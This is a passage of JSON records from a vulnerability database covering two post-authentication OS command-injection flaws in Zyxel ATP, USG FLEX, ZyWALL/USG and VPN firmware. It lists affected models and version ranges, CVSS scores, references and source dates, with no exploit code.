                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_flex_100:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_flex_50_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "5.36",
                        "versionStartIncluding": "4.50",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_flex_50:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_flex_200_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "5.36",
                        "versionStartIncluding": "4.50",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_flex_200:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_flex_500_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "5.36",
                        "versionStartIncluding": "4.50",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_flex_500:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_flex_700_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "5.36",
                        "versionStartIncluding": "4.50",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_flex_700:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_flex_100w_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "5.36",
                        "versionStartIncluding": "4.50",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_flex_100w:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_20w-vpn_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "5.36",
                        "versionStartIncluding": "4.16",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_20w-vpn:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_flex_50w_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "5.36",
                        "versionStartIncluding": "4.16",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_flex_50w:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg20-vpn_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "5.36",
                        "versionStartIncluding": "4.30",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg20-vpn:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:vpn100_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "5.36",
                        "versionStartIncluding": "4.30",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:vpn100:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:vpn1000_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "5.36",
                        "versionStartIncluding": "4.30",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:vpn1000:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:vpn300_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "5.36",
                        "versionStartIncluding": "4.30",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:vpn300:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:vpn50_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "5.36",
                        "versionStartIncluding": "4.30",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:vpn50:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2023-27991"
          }
        ]
      },
      "cve": "CVE-2023-27991",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "NVD",
                "availabilityImpact": "HIGH",
                "baseScore": 8.8,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 2.8,
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "LOW",
                "scope": "UNCHANGED",
                "trust": 2.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.1"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "NVD",
                "availabilityImpact": "High",
                "baseScore": 8.8,
                "baseSeverity": "High",
                "confidentialityImpact": "High",
                "exploitabilityScore": null,
                "id": "CVE-2023-27991",
                "impactScore": null,
                "integrityImpact": "High",
                "privilegesRequired": "Low",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "NVD",
                "id": "CVE-2023-27991",
                "trust": 1.8,
                "value": "HIGH"
              },
              {
                "author": "security@zyxel.com.tw",
                "id": "CVE-2023-27991",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202304-1940",
                "trust": 0.6,
                "value": "HIGH"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2023-009235"
          },
          {
            "db": "NVD",
            "id": "CVE-2023-27991"
          },
          {
            "db": "NVD",
            "id": "CVE-2023-27991"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202304-1940"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "The post-authentication command injection vulnerability in the CLI command of Zyxel ATP series firmware versions 4.32 through 5.35, USG FLEX series firmware versions 4.50 through 5.35, USG FLEX 50(W) firmware versions 4.16 through 5.35, USG20(W)-VPN firmware versions 4.16 through 5.35, and VPN series firmware versions 4.30 through 5.35, which could allow an authenticated attacker to execute some OS commands remotely. ATP200 firmware, ATP100 firmware, ATP700 firmware etc. ZyXEL The product has OS A command injection vulnerability exists.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2023-27991"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2023-009235"
          },
          {
            "db": "VULMON",
            "id": "CVE-2023-27991"
          }
        ],
        "trust": 1.71
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2023-27991",
            "trust": 3.3
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2023-009235",
            "trust": 0.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202304-1940",
            "trust": 0.6
          },
          {
            "db": "VULMON",
            "id": "CVE-2023-27991",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2023-27991"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2023-009235"
          },
          {
            "db": "NVD",
            "id": "CVE-2023-27991"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202304-1940"
          }
        ]
      },
      "id": "VAR-202304-2162",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "VARIoT devices database",
            "id": null
          }
        ],
        "trust": 0.3125
      },
      "last_update_date": "2023-12-18T13:41:28.498000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "Zyxel ATP Fixes for operating system command injection vulnerabilities",
            "trust": 0.6,
            "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=235563"
          }
        ],
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202304-1940"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-78",
            "trust": 1.0
          },
          {
            "problemtype": "OS Command injection (CWE-78) [NVD evaluation ]",
            "trust": 0.8
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2023-009235"
          },
          {
            "db": "NVD",
            "id": "CVE-2023-27991"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.5,
            "url": "https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-advisory-for-xss-vulnerability-and-post-authentication-command-injection-vulnerability-in-firewalls"
          },
          {
            "trust": 0.8,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2023-27991"
          },
          {
            "trust": 0.6,
            "url": "https://cxsecurity.com/cveshow/cve-2023-27991/"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov"
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2023-27991"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2023-009235"
          },
          {
            "db": "NVD",
            "id": "CVE-2023-27991"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202304-1940"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "VULMON",
            "id": "CVE-2023-27991"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2023-009235"
          },
          {
            "db": "NVD",
            "id": "CVE-2023-27991"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202304-1940"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2023-04-24T00:00:00",
            "db": "VULMON",
            "id": "CVE-2023-27991"
          },
          {
            "date": "2023-12-05T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2023-009235"
          },
          {
            "date": "2023-04-24T18:15:09.497000",
            "db": "NVD",
            "id": "CVE-2023-27991"
          },
          {
            "date": "2023-04-24T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202304-1940"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2023-04-25T00:00:00",
            "db": "VULMON",
            "id": "CVE-2023-27991"
          },
          {
            "date": "2023-12-05T03:46:00",
            "db": "JVNDB",
            "id": "JVNDB-2023-009235"
          },
          {
            "date": "2023-06-13T13:18:19.840000",
            "db": "NVD",
            "id": "CVE-2023-27991"
          },
          {
            "date": "2023-05-04T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202304-1940"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202304-1940"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "plural \u00a0ZyXEL\u00a0 In the product \u00a0OS\u00a0 Command injection vulnerability",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2023-009235"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "operating system commend injection",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202304-1940"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-202302-0865

    Vulnerability from variot - Updated: 2023-12-18 13:26

    A post-authentication command injection vulnerability in the CLI command of Zyxel ZyWALL/USG series firmware versions 4.20 through 4.72, VPN series firmware versions 4.30 through 5.32, USG FLEX series firmware versions 4.50 through 5.32, and ATP series firmware versions 4.32 through 5.32, which could allow an authenticated attacker with administrator privileges to execute OS commands. plural Zyxel The product has OS A command injection vulnerability exists.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202302-0865",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "usg flex 500",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.32"
          },
          {
            "model": "zywall 110",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.20"
          },
          {
            "model": "atp800",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.32"
          },
          {
            "model": "vpn300",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.32"
          },
          {
            "model": "atp100w",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.32"
          },
          {
            "model": "usg40",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.72"
          },
          {
            "model": "vpn300",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.30"
          },
          {
            "model": "usg flex 500",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.50"
          },
          {
            "model": "usg40w",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.72"
          },
          {
            "model": "atp200",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.32"
          },
          {
            "model": "vpn100",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.32"
          },
          {
            "model": "usg40w",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.20"
          },
          {
            "model": "zywall 110",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.72"
          },
          {
            "model": "atp700",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.32"
          },
          {
            "model": "vpn1000",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.32"
          },
          {
            "model": "vpn100",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.30"
          },
          {
            "model": "zywall 1100",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.20"
          },
          {
            "model": "usg flex 50",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.32"
          },
          {
            "model": "usg60",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.20"
          },
          {
            "model": "usg20w-vpn",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.30"
          },
          {
            "model": "atp500",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.32"
          },
          {
            "model": "usg flex 700",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.32"
          },
          {
            "model": "usg flex 100",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.32"
          },
          {
            "model": "vpn1000",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.30"
          },
          {
            "model": "vpn50",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.30"
          },
          {
            "model": "vpn50",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.32"
          },
          {
            "model": "usg20w-vpn",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.32"
          },
          {
            "model": "zywall 310",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.20"
          },
          {
            "model": "atp100",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.32"
          },
          {
            "model": "atp100w",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.32"
          },
          {
            "model": "usg flex 50",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.50"
          },
          {
            "model": "zywall 1100",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.72"
          },
          {
            "model": "usg flex 200",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.32"
          },
          {
            "model": "usg flex 100",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.50"
          },
          {
            "model": "usg60",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.72"
          },
          {
            "model": "usg60w",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.20"
          },
          {
            "model": "usg flex 100w",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.32"
          },
          {
            "model": "atp800",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.32"
          },
          {
            "model": "zywall 310",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.72"
          },
          {
            "model": "atp200",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.32"
          },
          {
            "model": "usg40",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.20"
          },
          {
            "model": "atp700",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.32"
          },
          {
            "model": "usg20-vpn",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.30"
          },
          {
            "model": "usg flex 700",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.50"
          },
          {
            "model": "usg flex 200",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.50"
          },
          {
            "model": "usg20-vpn",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.32"
          },
          {
            "model": "atp100",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.32"
          },
          {
            "model": "atp500",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.32"
          },
          {
            "model": "usg60w",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.72"
          },
          {
            "model": "usg flex 100w",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.50"
          },
          {
            "model": "usg flex 200",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "usg flex 50",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "atp200",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "atp700",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "atp100w",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "usg flex 500",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "atp500",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "usg flex 700",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "atp800",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "atp100",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2023-003229"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-38547"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:atp100_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.32",
                        "versionStartIncluding": "4.32",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:atp100:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:atp200_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.32",
                        "versionStartIncluding": "4.32",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:atp200:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:atp700_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.32",
                        "versionStartIncluding": "4.32",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
